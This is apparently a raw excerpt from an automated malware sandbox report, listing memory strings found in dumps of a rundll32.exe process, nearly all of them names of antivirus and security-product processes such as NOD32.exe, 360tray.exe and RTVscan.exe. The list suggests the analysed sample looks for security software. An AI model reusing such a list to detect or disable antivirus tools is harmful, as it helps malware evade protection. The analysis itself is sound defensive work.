    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: drweb32w.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aswupdsv.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pctsGui.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360tray.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kissvc.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avuser.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav95.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WEBPROXY.EXE
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NOD32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcvsshld.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CCenter.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KWatch.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: inicio.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E5000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: mcvsrte.exe
    Source: rundll32.exe, 00000007.00000003.2335770527.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2333913914.000001F583DC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239256609.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cfp.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: aswUpdsv.exe
    Source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsaa.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RTVscan.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FPROTTRAY.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KvXP.kxp
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: portmonitor.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089140201.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461916716.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PSIMSVC.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tmproxy.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522323197.0000025BF0176000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fih32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dwuser.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KAVSTART.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 